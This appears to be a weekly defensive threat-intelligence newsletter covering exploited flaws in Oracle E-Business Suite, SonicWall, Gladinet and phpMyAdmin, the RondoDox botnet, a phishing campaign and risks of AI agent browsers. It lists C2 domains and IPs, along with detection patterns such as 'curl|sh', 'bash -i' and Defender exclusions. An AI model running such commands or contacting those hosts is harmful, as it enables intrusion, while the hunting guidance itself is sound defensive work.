oracle

Sunday Edition - Sunday Edition: Perimeter Problems, Patching Frenzy

UncleSp1d3r

UncleSp1d3r

5 min read

This week was a buffet of the usual suspects: exposed admin panels, edge gear with “please shell me” banners, an enterprise zero-day pressed into extortion, and AI browsers quietly auditioning for “Shadow IT: The Musical.” If you manage anything with a WAN IP or an upload handler, this was not the week to be on PTO.

Actively Exploited, Right Now

Oracle E‑Business Suite zero‑day confirmed: CL0P, GOLDVEIN → SAGE, and extortion

KryptoKat: Google’s Threat Intelligence team and Mandiant confirmed mass exploitation of CVE-2025-61882 in Oracle E‑Business Suite, hitting UiServlet/SyncServlet for unauthenticated RCE. Post‑compromise, attackers deploy a Java implant chain (GOLDVEIN downloader → SAGE loader—variants like SAGEGIFT/SAGELEAF/SAGEWAVE) with an in‑memory servlet filter to live off the land as the applmgr account. It’s tied to CL0P‑branded extortion threatening to leak stolen EBS data. Oracle shipped emergency patches Oct 4–5; apply them yesterday (Oracle Security Alert, GTIG/Mandiant, NVD).

What to do next:

  • Patch all EBS instances and yank public access to UiServlet/SyncServlet. Require VPN/jump hosts and IP allow‑lists.
  • Hunt in DB for abused templates: query XDO_TEMPLATES_B/XDO_LOBS for odd entries (TemplateCode starting TMP/DEF) and review TemplatePreviewPG hits.
  • Memory forensics on Java procs for in‑memory loaders; use GTIG YARA for GOLDVEIN/SAGE.
  • Block C2s: domains pubstorm.com, pubstorm.net; IPs 200.107.207.26, 185.181.60.11, 161.97.99.49, 162.55.17.215, 104.194.11.200.
  • Watch for Java spawning shells (bash -i) and outbound data trickles; rotate any credentials that could be downstream of the app.

RondoDox botnet: “exploit shotgun” keeps firing

UncleSp1d3r: RondoDox continues mass‑scanning WAN admin panels on routers, DVR/NVRs, CCTV, and random embedded web servers, then pelting them with ~50–56 n‑days until something cracks. Successful hits hand off to a multi‑arch loader that fetches RondoDox ± Mirai/Morte for DDoS/mining and opportunistic pivoting. New reporting includes hashes/IPs and a published IOC list—use it (Trend Micro, IOC list, DarkReading). CVEs in play include CVE-2023-1389, CVE-2024-3721, CVE-2024-12856, plus newcomers like CVE-2025-7414 and CVE-2025-5504.

Immediate actions:

  • Block public management (HTTP/HTTPS/Telnet/SSH). Gate via VPN/jumps; allow‑list admin IPs.
  • Patch firmware; prioritize KEV and Trend’s callouts. Where vendors are MIA, virtual patch with WAF/IPS for traversal/command‑injection patterns.
  • Hunt for shells spawned by web processes and loader breadcrumbs: “#!/bin/sh”, “chmod 777”, “curl|sh”, rapid file drops.
  • Egress controls for odd HTTP/UDP floods and rotating C2 IPs (74.194.191.52, 83.252.42.112, 38.59.219.27, 14.103.145.202); sample hashes: 24b96599…, 16003678…, 6a77842d….

phpMyAdmin log‑poisoning → AntSword → Nezha (RMM) → Ghost RAT

KryptoKat: Huntress documented a campaign abusing internet‑exposed phpMyAdmin with MariaDB general_log to write a PHP web shell, then driving AntSword to fetch Nezha (legit monitoring agent repurposed as an RMM) and stage Ghost RAT. Post‑compromise, we’ve seen Defender tampering (Add‑MpPreference exclusions), a persistence service misspelled SQLlite, DLL side‑loading, and encrypted C2. Over 100 victims, heavy in East Asia (Huntress, Infosecurity).

Block/hunt highlights:

  • Kill WAN exposure for phpMyAdmin. Require VPN + strong auth; disable general_log in production.
  • Monitor for web shell POSTs (e.g., /htdocs/123.php), httpd/IIS child processes launching curl/powershell.exe.
  • C2s: rism.pages.dev, c.mid.al, gd.bj2.xyz; IPs 54.46.50.255, 45.207.220.12, 172.245.52.169, 38.246.250.201.
  • Host clues: services named SQLlite, files under C:\Windows\Cursors\, mutex gd.bj2[.]xyz:53762:SQLlite.

Urgent Patch/Protect

Gladinet CentreStack & Triofox CVE-2025-11371: LFI → ViewState deserialization RCE

KryptoKat: Actively exploited, unauthenticated LFI lets attackers read Web.config, lift machine keys, and pivot into a ViewState deserialization RCE on the web tier. Huntress has incidents in hand and a vendor‑endorsed workaround while patches bake: disable the temp handler in UploadDownloadProxy\Web.config. Expect some feature impact; it’s better than feature‑complete backdoors (Huntress, NVD).

Checklist:

  • Pull these portals off the internet; force VPN/allow‑listed admin IPs.
  • Apply the temp handler workaround at C:\Program Files (x86)\Gladinet Cloud Enterprise\UploadDownloadProxy\Web.config.
  • Rotate machine/app keys and anything in Web.config/backups; hunt for web shells and ViewState tampering artifacts; add WAF/IPS for LFI patterns.

SonicWall, two ways: cloud backup access + Akira on SSL VPNs

UncleSp1d3r: SonicWall confirmed an intruder accessed configuration backups stored in MySonicWall’s cloud backup service—if you used it, assume your configs are in the wild. At the same time, Akira operators are exploiting CVE-2024-40766 on SonicWall SSL VPNs for initial access before the usual smash‑and‑encrypt routine. It’s a lousy pairing: exposed configs plus unpatched VPNs equals easy mode (SonicWall advisory, CISA, Rapid7, Arctic Wolf).

Do now:

  • Rotate everything in backups: admin creds, VPN PSKs, RADIUS/LDAP binds, API tokens, certs/keys; consider disabling cloud backups until validated.
  • Patch for CVE-2024-40766; if you can’t, restrict SSL VPN access via IP allow‑lists or choke‑point a separate ingress VPN/jump.
  • Enforce MFA, revoke suspect OTP seeds; comb VPN/firewall logs for odd logins and short pre‑ransom dwell.
  • Watch for rapid lateral movement and exfil indicators; contain egress from segments with VPN exposure.

Espionage & Targeted Phishing

SideWinder’s “Operation SouthNet”: free‑hosting phishing at scale

KryptoKat: SideWinder is working the South Asia beat with tailored Outlook/Zimbra lures and more than 50 credential‑harvesting portals on Netlify, pages.dev, workers.dev, b4a.run, and friends. They’re also staging payloads in open directories—because if it’s free and public, someone will eventually weaponize it. Expect credential theft → staged malware → long‑dwell espionage (OTX pulse, Hunt.io).

Practical mitigations:

  • Phishing‑resistant MFA (FIDO2) for webmail/admin; block external auto‑forwards; kill legacy auth.
  • Treat free‑hosting URLs as risky by default; URL rewriting/inspection and rate limits on mass‑clicked links.
  • Gateway rules/YARA for credential forms; monitor clusters of similar lures to the same org.

AI‑Adjacent Weirdness

SquareX: AI browsers and agent workflows widen the blast radius

KryptoKat: SquareX dunked on “AI browsers” this week, showing how agent workflows can quietly abuse OAuth consent, silently fetch malware, and mass‑share malicious links through semi‑trusted UI flows. None of this requires a zero‑day—just enthusiastic automation with too much reach, too few guardrails. Treat agentic browsers like you would any new endpoint platform: constrained, monitored, and subject to the same governance you apply to extensions and proxies (SquareX, Security Boulevard).

Programmatic fixes:

  • Inventory and, where possible, disable agent features; require enterprise‑signed extensions.
  • Harden OAuth: minimal scopes, incremental consent, short‑lived tokens, revocation on anomaly; instrument proxies/SSE to flag agent‑initiated OAuth and odd download bursts.
  • Isolate high‑value SaaS workflows in managed/isolated browsers; block unapproved AI browsers from sensitive apps.

Heads‑Up: Coordinated Disclosure Brewing

ZDI‑CAN‑28255 — “All Hands” (CVSS 7.8), long fuse

KryptoKat: ZDI posted an upcoming advisory for All Hands with a 7.8 CVSS and an extended deadline to 2026‑02‑06. No technicals yet, no exploitation noted, but the risk profile screams “don’t expose this to the internet.” Inventory instances, clamp down access, and set WAF/IPS tripwires while you wait (ZDI Upcoming Advisories).

IOC quick‑grab

  • Oracle EBS CVE-2025-61882 C2: pubstorm.com, pubstorm.net; IPs 200.107.207.26, 185.181.60.11, 161.97.99.49, 162.55.17.215, 104.194.11.200. Sample hashes: 76b6d36e…, aa0d3859…, 6fd538e4….
  • RondoDox: IPs 74.194.191.52, 83.252.42.112, 38.59.219.27, 14.103.145.202. See Trend’s full IOC list.
  • phpMyAdmin/Nezha/Ghost: domains rism.pages.dev, c.mid.al, gd.bj2.xyz; IPs 54.46.50.255, 45.207.220.12, 172.245.52.169, 38.246.250.201. Hashes: f3570bb6…, 9f33095a…, 7b2599ed…, 82611e60…, 35e0b221….

The week in one breath

  • Patch Oracle EBS and lock UiServlet/SyncServlet behind VPN/jumps. Hunt XDO template abuse and in‑memory loaders.
  • Pull CentreStack/Triofox off the internet, apply the temp handler workaround, and rotate keys.
  • Restrict WAN management across edge fleets. Patch or virtually patch RondoDox‑favored CVEs.
  • Rotate SonicWall creds/PSKs/API tokens; patch SSL VPN (CVE-2024-40766), tighten access, and review logs for Akira‑ish activity.
  • Delete public phpMyAdmin from your life. Hunt AntSword/Nezha/Ghost RAT traces.
  • Treat AI browsers like an untrusted new platform: scope, govern, and monitor OAuth+downloads.

Closing thoughts: It is a truth universally acknowledged, that a publicly exposed admin interface in possession of a good banner, must be in want of an exploit. Spend your Monday making that untrue. We’ll bring the tea; you bring the ACLs.

— Kat & Sp1d3r

Read more